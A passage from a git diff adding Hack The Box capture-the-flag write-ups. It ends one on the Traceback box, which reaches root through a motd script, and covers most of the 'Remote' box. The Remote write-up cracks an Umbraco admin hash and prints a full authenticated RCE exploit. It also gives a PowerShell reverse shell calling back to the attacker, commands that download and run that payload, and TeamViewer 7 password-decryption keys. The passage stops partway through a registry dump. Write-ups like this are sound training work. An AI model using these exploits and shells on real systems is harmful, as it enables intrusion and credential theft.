+ # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ # GNU General Public License for more details.
+ #
+ # You should have received a copy of the GNU General Public License along
+ # with this program; if not, write to the Free Software Foundation, Inc.,
+ # 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
+
+ [ -r /etc/lsb-release ] && . /etc/lsb-release
+
+
+ echo "\nWelcome to Xh4H land \n"
+
+
+
+the **00-header** file in particular is responsible for what message appears when you SSH into the machine, and any code in that file will be run as the root account since the ssh-server service is ran by the root user. Since the file is **owned by the sysadmin user** and **ran by the root user** , the sysadmin user can run commands as the root user. such as allowing our public key to be used to login as the root user:
+
+
+ sysadmin@traceback:/etc/update-motd.d$ echo "cp /home/sysadmin/.ssh/authorized_keys /root/.ssh/" >> 00-header
+
+
+
+Now to run the command we added, we ssh as the sysadmin user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/6 ] [~/HTB/Traceback]
+ → ssh sysadmin@10.10.10.181 -i ~/.ssh/id_ed25519
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+and before the 30 second cleanup happens, we login as the root user:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/31 ] [~/HTB/Traceback]
+ → ssh root@10.10.10.181 -i ~/.ssh/id_ed25519
+ #################################
+ -------- OWNED BY XH4H ---------
+ - I guess stuff could have been configured better ^^ -
+ #################################
+
+ Welcome to Xh4H land
+
+
+
+ Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
+
+ Last login: Mon Apr 26 02:23:35 2021
+ root@traceback:~# id
+ uid=0(root) gid=0(root) groups=0(root)
+ root@traceback:~# cat root.txt
+ c4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/44.md b/Easy/44.md
new file mode 100644
index 0000000..ff96bf6
--- /dev/null
+++ b/Easy/44.md
@@ -0,0 +1,719 @@
+# Remote Writeup
+
+
+
+## Introduction :
+
+Remote is an easy Windows box released back in march 2020
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → nmap -vvv -p- 10.10.10.180 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 80/tcp on 10.10.10.180
+ Discovered open port 111/tcp on 10.10.10.180
+ Discovered open port 135/tcp on 10.10.10.180
+ Discovered open port 139/tcp on 10.10.10.180
+ Discovered open port 445/tcp on 10.10.10.180
+ Discovered open port 21/tcp on 10.10.10.180
+ Discovered open port 49666/tcp on 10.10.10.180
+ Discovered open port 49678/tcp on 10.10.10.180
+ Discovered open port 5985/tcp on 10.10.10.180
+ Discovered open port 47001/tcp on 10.10.10.180
+ Discovered open port 49667/tcp on 10.10.10.180
+ Discovered open port 49665/tcp on 10.10.10.180
+ Discovered open port 2049/tcp on 10.10.10.180
+ Discovered open port 49664/tcp on 10.10.10.180
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → nmap -sCV 10.10.10.180 -p 21,80,111,135,445,2049
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-30 18:12 CEST
+ Nmap scan report for 10.10.10.180
+ Host is up (0.043s latency).
+
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
+ |_http-title: Home - Acme Widgets
+ 111/tcp open rpcbind 2-4 (RPC #100000)
+ | rpcinfo:
+ | program version port/proto service
+ | 100000 2,3,4 111/tcp rpcbind
+ | 100000 2,3,4 111/tcp6 rpcbind
+ | 100000 2,3,4 111/udp rpcbind
+ | 100000 2,3,4 111/udp6 rpcbind
+ | 100003 2,3 2049/udp nfs
+ | 100003 2,3 2049/udp6 nfs
+ | 100003 2,3,4 2049/tcp nfs
+ | 100003 2,3,4 2049/tcp6 nfs
+ | 100005 1,2,3 2049/tcp mountd
+ | 100005 1,2,3 2049/tcp6 mountd
+ | 100005 1,2,3 2049/udp mountd
+ | 100005 1,2,3 2049/udp6 mountd
+ | 100021 1,2,3,4 2049/tcp nlockmgr
+ | 100021 1,2,3,4 2049/tcp6 nlockmgr
+ | 100021 1,2,3,4 2049/udp nlockmgr
+ | 100021 1,2,3,4 2049/udp6 nlockmgr
+ | 100024 1 2049/tcp status
+ | 100024 1 2049/tcp6 status
+ | 100024 1 2049/udp status
+ |_ 100024 1 2049/udp6 status
+ 135/tcp open msrpc Microsoft Windows RPC
+ 445/tcp open microsoft-ds?
+ 2049/tcp open mountd 1-3 (RPC #100005)
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: 7m35s
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2021-05-30T16:21:22
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 83.57 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 21 FTP with anonymous login allowed, We can recursively get what's there with wget :
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → wget -r ftp://anonymous:anonymous@10.10.10.180/
+
+
+
+However there are no files to get so we're going to continue exploring port 80 instead:
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → gobuster dir -u http://10.10.10.180 -w /usr/share/seclists/Discovery/Web-Content/common.txt
+ ===============================================================
+ Gobuster v3.1.0
+ by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
+ ===============================================================
+ [+] Url: http://10.10.10.180
+ [+] Method: GET
+ [+] Threads: 10
+ [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/common.txt
+ [+] Negative Status codes: 404
+ [+] User Agent: gobuster/3.1.0
+ [+] Timeout: 10s
+ ===============================================================
+ 2021/05/30 18:42:03 Starting gobuster in directory enumeration mode
+ ===============================================================
+ /Blog (Status: 200) [Size: 5001]
+ /Contact (Status: 200) [Size: 7880]
+ /Home (Status: 200) [Size: 6703]
+ /People (Status: 200) [Size: 6749]
+ /Products (Status: 200) [Size: 5338]
+ /about-us (Status: 200) [Size: 5451]
+ /blog (Status: 200) [Size: 5011]
+ /contact (Status: 200) [Size: 7890]
+ /home (Status: 200) [Size: 6703]
+ /install (Status: 302) [Size: 126] [--> /umbraco/]
+ /intranet (Status: 200) [Size: 3323]
+ /master (Status: 500) [Size: 3420]
+ /people (Status: 200) [Size: 6739]
+ /person (Status: 200) [Size: 2741]
+ /product (Status: 500) [Size: 3420]
+ /products (Status: 200) [Size: 5328]
+ /render/https://www.google.com (Status: 400) [Size: 3420]
+ /umbraco (Status: 200) [Size: 4040]
+
+ ===============================================================
+ 2021/05/30 18:43:05 Finished
+ ===============================================================
+
+
+
+Here we see that gobuster picked up the /umbraco/ directory:
+
+
+
+Although we don't have credentials to get in yet. Our nmap scan picked up some available NFS shares on port 111, so let's enumerate those using the **showmount** utility:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → apt search showmount
+ Sorting... Done
+ Full Text Search... Done
+ nfs-common/kali-rolling,now 1:1.3.4-5 amd64 [installed,automatic]
+ NFS support files common to client and server
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → sudo apt install nfs-common -y
+ [sudo] password for nothing:
+ Reading package lists... Done
+ Building dependency tree... Done
+ Reading state information... Done
+ nfs-common is already the newest version (1:1.3.4-5).
+ nfs-common set to manually installed.
+ 0 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → showmount -e 10.10.10.180
+ Export list for 10.10.10.180:
+ /site_backups (everyone)
+
+
+
+Here we see a mountable folder called site_backups, so let's mount it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → mkdir backups
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → sudo mount -t nfs 10.10.10.180:/site_backups backups/
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → ls -lash backups
+ total 123K
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 23 2020 .
+ 4.0K drwxr-xr-x 4 nothing nothing 4.0K May 30 19:40 ..
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 App_Browsers
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Data
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 App_Plugins
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 aspnet_client
+ 48K drwx------ 2 nobody 4294967294 48K Feb 20 2020 bin
+ 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Config
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 css
+ 512 -rwx------ 1 nobody 4294967294 152 Nov 1 2018 default.aspx
+ 512 -rwx------ 1 nobody 4294967294 89 Nov 1 2018 Global.asax
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Media
+ 512 drwx------ 2 nobody 4294967294 64 Feb 20 2020 scripts
+ 8.0K drwx------ 2 nobody 4294967294 8.0K Feb 20 2020 Umbraco
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Umbraco_Client
+ 4.0K drwx------ 2 nobody 4294967294 4.0K Feb 20 2020 Views
+ 28K -rwx------ 1 nobody 4294967294 28K Feb 20 2020 Web.config
+
+
+Now here in the files we see that there are some Umbraco directories, and after searching a bit online, we see that there can be a server database in the **/App_Data** folder named **Umbraco.sdf**
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → strings backups/App_Data/Umbraco.sdf| grep Administrator
+ Administratoradmindefaulten-US
+ Administratoradmindefaulten-USb22924d5-57de-468e-9df4-0961cf6aa30d
+ Administratoradminb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}en-USf8512f97-cab1-4a4b-a49f-0a2054c47a1d
+ adminAdministratorsCADMOSKTPIURZ:5F7
+
+
+Here we see that the Administrator user has a hashed password with the SHA1 algorithm, so let's attempt to crack it using john:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat hash.txt
+ b8be16afba8c314ad33d812f22a04991b90e2aaa
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → john hash.txt --format=Raw-SHA1 -w=/usr/share/wordlists/rockyou.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (Raw-SHA1 [SHA1 256/256 AVX2 8x])
+ Warning: no OpenMP support for this hash type, consider --fork=4
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+ baconandcheese (?)
+ 1g 0:00:00:00 DONE (2021-05-30 19:47) 1.282g/s 12594Kp/s 12594Kc/s 12594KC/s baconandchipies1..bacon918
+ Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably
+ Session completed
+
+
+
+And we found the Administrator password for Umbraco: **baconandcheese** , so let's login:
+
+
+
+Clicking help at the bottom left corner, we can see the version of this Umbraco instance:
+
+
+
+And so we can look for CVEs for that Umbraco version:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → searchsploit umbraco
+ ------------------------------------------------------- ---------------------------------
+ Exploit Title | Path
+ ------------------------------------------------------- ---------------------------------
+ Umbraco CMS - Remote Command Execution (Metasploit) | windows/webapps/19671.rb
+ **Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execu | aspx/webapps/46153.py**
+ Umbraco CMS 7.12.4 - Remote Code Execution (Authentica | aspx/webapps/49488.py
+ Umbraco CMS SeoChecker Plugin 1.9.2 - Cross-Site Scrip | php/webapps/44988.txt
+ ------------------------------------------------------- ---------------------------------
+ Shellcodes: No Results
+
+
+And we get a few exploits to use for our Umbraco instance! Let's try the first RCE exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cp $(locate 46153.py) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat 46153.py
+ # Exploit Title: Umbraco CMS - Remote Code Execution by authenticated administrators
+ # Dork: N/A
+ # Date: 2019-01-13
+ # Exploit Author: Gregory DRAPERI & Hugo BOUTINON
+ # Vendor Homepage: http://www.umbraco.com/
+ # Software Link: https://our.umbraco.com/download/releases
+ # Version: 7.12.4
+ # Category: Webapps
+ # Tested on: Windows IIS
+ # CVE: N/A
+
+
+ import requests;
+
+ from bs4 import BeautifulSoup;
+
+ def print_dict(dico):
+ print(dico.items());
+
+ print("Start");
+
+ # Execute a calc for the PoC
+ payload = '<****?xml version="1.0"?> <****xsl:stylesheet version="1.0" \
+ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \
+ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <****msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \
+ { string**cmd = "wget 10.10.14.13/your_rce_attempt_worked!";** System.Diagnostics.Process proc = new System.Diagnostics.Process();\
+ proc.StartInfo.FileName = **"powershell.exe";** proc.StartInfo.Arguments = cmd;\
+ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \
+ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \
+ <****/msxsl:script> <****xsl:template match="/"> <****xsl:value-of select="csharp_user:xml()"/>\ <****/xsl:template> <****/xsl:stylesheet> ';**login = "admin@htb.local";
+ password="baconandcheese";
+ host = "http://10.10.10.180";**
+ # Step 1 - Get Main page
+ s = requests.session()
+ url_main =host+"/umbraco/";
+ r1 = s.get(url_main);
+ print_dict(r1.cookies);
+
+ # Step 2 - Process Login
+ url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin";
+ loginfo = {"username":login,"password":password};
+ r2 = s.post(url_login,json=loginfo);
+
+ # Step 3 - Go to vulnerable web page
+ url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx";
+ r3 = s.get(url_xslt);
+
+ soup = BeautifulSoup(r3.text, 'html.parser');
+ VIEWSTATE = soup.find(id="__VIEWSTATE")['value'];
+ VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value'];
+ UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN'];
+ headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN};
+ data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"};
+
+ # Step 4 - Launch the attack
+ r4 = s.post(url_xslt,data=data,headers=headers);
+
+ print("End");%
+
+
+
+Make sure you edit the values of login, password, host, powershell.exe and wget tun0/rcetest that i highlighted above, then proceed:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 46153.py
+ Start
+ []
+ End
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → sudo python3 -m http.server 80
+ [sudo] password for nothing:
+ Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
+ 10.10.10.180 - - [31/May/2021 06:48:29] code 404, message File not found
+ 10.10.10.180 - - [31/May/2021 06:48:29] "GET /your_rce_attempt_worked! HTTP/1.1" 404 -
+
+
+And now after testing it we see that we have been able to get the machine to execute the wget command back to us, however [noraj](https://pwn.by/noraj/index.md) made a much better rewrite of this Umbraco RCE python exploit which allows us to pass arguements:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → wget https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
+ --2021-05-31 07:07:53-- https://raw.githubusercontent.com/noraj/Umbraco-RCE/master/exploit.py
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.111.133, 185.199.109.133, 185.199.110.133, ...
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.111.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 3202 (3.1K) [text/plain]
+ Saving to: ‘exploit.py’
+
+ exploit.py 100%[======================================================================================================================================================>] 3.13K --.-KB/s in 0s
+
+ 2021-05-31 07:07:53 (6.52 MB/s) - ‘exploit.py’ saved [3202/3202]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -h
+ usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS]
+
+ Umbraco authenticated RCE
+
+ optional arguments:
+ -h, --help show this help message and exit
+ -u USER, --user USER username / email
+ -p PASS, --password PASS password
+ -i URL, --host URL root URL
+ -c CMD, --command CMD command
+ -a ARGS, --arguments ARGS arguments
+
+
+
+So let's use it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command whoami'
+ iis apppool\defaultapppool
+
+
+
+We see that we can get remote code execution as the apppool user,
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command systeminfo'
+
+ Host Name: REMOTE
+ OS Name: Microsoft Windows Server 2019 Standard
+ OS Version: 10.0.17763 N/A Build 17763
+ OS Manufacturer: Microsoft Corporation
+ OS Configuration: Standalone Server
+ OS Build Type: Multiprocessor Free
+ Registered Owner: Windows User
+ Registered Organization:
+ Product ID: 00429-00521-62775-AA801
+ Original Install Date: 2/19/2020, 4:03:29 PM
+ System Boot Time: 5/30/2021, 12:07:27 PM
+ System Manufacturer: VMware, Inc.
+ System Model: VMware7,1
+ System Type: x64-based PC
+ Processor(s): 4 Processor(s) Installed.
+ [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [03]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ [04]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
+ BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 6/19/2019
+ Windows Directory: C:\Windows
+ System Directory: C:\Windows\system32
+ Boot Device: \Device\HarddiskVolume1
+ System Locale: en-us;English (United States)
+ Input Locale: en-us;English (United States)
+ Time Zone: (UTC-05:00) Eastern Time (US & Canada)
+ Total Physical Memory: 4,095 MB
+ Available Physical Memory: 2,745 MB
+ Virtual Memory: Max Size: 4,799 MB
+ Virtual Memory: Available: 3,426 MB
+ Virtual Memory: In Use: 1,373 MB
+ Page File Location(s): C:\pagefile.sys
+ Domain: WORKGROUP
+ Logon Server: N/A
+ **Hotfix(s): 5 Hotfix(s) Installed.
+ [01]: KB4534119
+ [02]: KB4462930
+ [03]: KB4516115
+ [04]: KB4523204
+ [05]: KB4464455**
+ Network Card(s): 1 NIC(s) Installed.
+ [01]: vmxnet3 Ethernet Adapter
+ Connection Name: Ethernet0 2
+ DHCP Enabled: No
+ IP address(es)
+ [01]: 10.10.10.180
+ [02]: fe80::108b:625:aa40:7e42
+ [03]: dead:beef::108b:625:aa40:7e42
+ Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
+
+
+
+And we also are able to print out the infos about the server itself, including the current hotfixes. However we first need to get a reverse shell onto the box, let's find where the ftp folder is:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/'
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ **d----- 2/20/2020 1:13 AM ftp_transfer**
+ d----- 2/19/2020 3:11 PM inetpub
+ d----- 2/19/2020 11:09 PM Microsoft
+ d----- 9/15/2018 3:19 AM PerfLogs
+ d-r--- 2/23/2020 2:19 PM Program Files
+ d----- 2/23/2020 2:19 PM Program Files (x86)
+ **d----- 5/30/2021 11:07 AM site_backups**
+ d-r--- 2/19/2020 3:12 PM Users
+ d----- 2/20/2020 12:52 AM Windows
+
+
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command ls c:/ftp_transfer'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command new-item c:/ftp_transfer/test.txt'
+
+
+ Directory: C:\ftp_transfer
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 5/31/2021 1:45 AM 0 test.txt
+
+
+And as you can see, we are able to write to the **C:\ftp_transfer** directory so let's make use of it by first locally creating our powershell script containing our reverse shell payload:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → vim shell.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → cat shell.ps1
+ $client = New-Object System.Net.Sockets.TCPClient(**"10.10.14.13",9001**);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
+
+
+
+This will send a reverse shell connection back to our **tun0** interface on port **9001** once we get the box to execute it. In order to do that, we can get this script into the ftp_transfer directory we found earlier:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command curl http://10.10.14.13:9090/shell.ps1 -o c:/ftp_transfer/shell.ps1'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → ls -lash shell.ps1
+ 4.0K -rw-r--r-- 1 nothing nothing 482 May 31 07:50 shell.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+ 10.10.10.180 - - [31/May/2021 07:53:26] "GET /shell.ps1 HTTP/1.1" 200 -
+
+
+
+Now that our shell.ps1 got uploaded, let's execute it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/2 ] [~/HTB/Remote]
+ → python3 exploit.py -u 'admin@htb.local' -p 'baconandcheese' -i 'http://10.10.10.180/' -c 'powershell.exe' -a '-noprofile -command c:/ftp_transfer/shell.ps1'
+
+ [ 10.10.14.13/23 ] [ /dev/pts/44 ] [~/HTB/Remote]
+ → nc -lvnp 9001
+ listening on [any] 9001 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.180] 49854
+ whoami
+ iis apppool\defaultapppool
+
+
+And we got a reverse shell connection!
+
+
+ # cd c:\users\public
+ # ls
+
+
+ Directory: C:\users\public
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d-r--- 2/19/2020 3:03 PM Documents
+ d-r--- 9/15/2018 3:19 AM Downloads
+ d-r--- 9/15/2018 3:19 AM Music
+ d-r--- 9/15/2018 3:19 AM Pictures
+ d-r--- 9/15/2018 3:19 AM Videos
+ -ar--- 5/30/2021 12:08 PM 34 user.txt
+
+
+ # cat user.txt
+ 67XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And we managed to get the user flag!
+
+## **Part 3 : Getting Root Access**
+
+Now in order to privesc to the Administrator user on this box, we're going to run winpeas on the box:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
+ → cp $(locate winPEAS.ps1) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/51 ] [~/HTB/Remote]
+ → ls -lash Invoke-winPEAS.ps1
+ 228K -rw-r--r-- 1 nothing nothing 228K May 31 09:00 Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/47 ] [~/HTB/Remote]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ # cd C:\ftp_transfer
+ # curl http://10.10.14.13:9090/Invoke-winPEAS.ps1 -o peas.ps1
+
+ # import-module ./peas.ps1
+ # Invoke-winPEAS
+
+
+
+So here we basically got our winpeas powershell module onto the box, then we imported it which gave us the Invoke-winPEAS command to execute:
+
+
+
+Immediately winPEAS found 9 potential CVEs on the box:
+
+
+
+However one of the intended privesc paths to follow was the TeamViewer v7 application that's installed on the box:
+
+
+
+
+ # cd 'C:\Program Files (x86)\TeamViewer\'
+ # ls
+
+
+ Directory: C:\Program Files (x86)\TeamViewer
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 5/31/2021 12:54 AM Version7
+
+
+
+We're going to take advantage of this teamviewer version 7 software to privesc to the Administrator user like how it was described in this [blogpost](https://whynotsecurity.com/blog/teamviewer/):
+
+First of all, TeamViewer7 stores the password in the registry under the value **SecurityPasswordAES** and this password is encrypted with **AES-128-CBC** , with the key set as **0602000000a400005253413100040000** and the Initialization Vector set as **0100010067244F436E6762F25EA8D704** , Looking up google a bit, we [find](https://community.teamviewer.com/English/kb/articles/16835-how-to-uninstall-teamviewer-on-pc) that the registry key for TeamViewer is under **HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer** :
+
+
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ # reg query HKLM\SOFTWARE\Wow6432Node\TeamViewer\Version7
+
+ HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\TeamViewer\Version7
+ StartMenuGroup REG_SZ TeamViewer 7
+ InstallationDate REG_SZ 2020-02-20
+ InstallationDirectory REG_SZ C:\Program Files (x86)\TeamViewer\Version7
+ Always_Online REG_DWORD 0x1
+ Security_ActivateDirectIn REG_DWORD 0x0
+ Version REG_SZ 7.0.43148
+ ClientIC REG_DWORD 0x11f25831
+ PK REG_BINARY BFAD2AEDB6C89AE0A0FD0501A0C5B9A5C0D957A4CC57C1884C84B6873EA03C069CF06195829821E28DFC2AAD372665339488DD1A8C85CDA8B19D0A5A2958D86476D82CA0F2128395673BA5A39F2B875B060D4D52BE75DB2B6C91EDB28E90DF7F2F3FBE6D95A07488AE934CC01DB8311176AEC7AC367AB4332ABD048DBFC2EF5E9ECC1333FC5F5B9E2A13D4F22E90EE509E5D7AF4935B8538BE4A606AB06FE8CC657930A24A71D1E30AE2188E0E0214C8F58CD2D5B43A52549F0730376DD3AE1DB66D1E0EBB0CF1CB0AA7F133148D1B5459C95A24DDEE43A76623759017F21A1BC8AFCD1F56FD0CABB340C9B99EE3828577371B7ADA9A8F967A32ADF6CF062B00026C66F8061D5CFF89A53EAE510620BC822BC6CC615D4DE093BC0CA8F5785131B75010EE5F9B6C228E650CA89697D07E51DBA40BF6FC3B2F2E30BF6F1C01F1BC2386FA226FFFA2BE25AE33FA16A2699A1124D9133F18B50F4DB6EDA2D23C2B949D6D2995229BC03507A62FCDAD55741B29084BD9B176CFAEDAAA9D48CBAF2C192A0875EC748478E51156CCDD143152125AE7D05177083F406703ED44DCACCD48400DD88A568520930BED69FCD672B15CD3646F8621BBC35391EAADBEDD04758EE8FC887BACE6D8B59F61A5783D884DBE362E2AC6EAC0671B6B5116345043257C537D27A8346530F8B7F5E0EBACE9B840E716197D4A0C3D68CFD2126E8245B01E62B4CE597AA3E2074C8AB1A4583B04DBB13F13EB54E64B850742A8E3E8C2FAC0B9B0CF28D71DD41F67C773A19D7B1A2D0A257A4D42FC6214AB870710D5E841CBAFCD05EF13B372F36BF7601F55D98ED054ED0F321AEBA5F91D390FF0E8E5815E6272BA4ABB3C85CF4A8B07851903F73317C0BC77FA12A194BB75999319222516
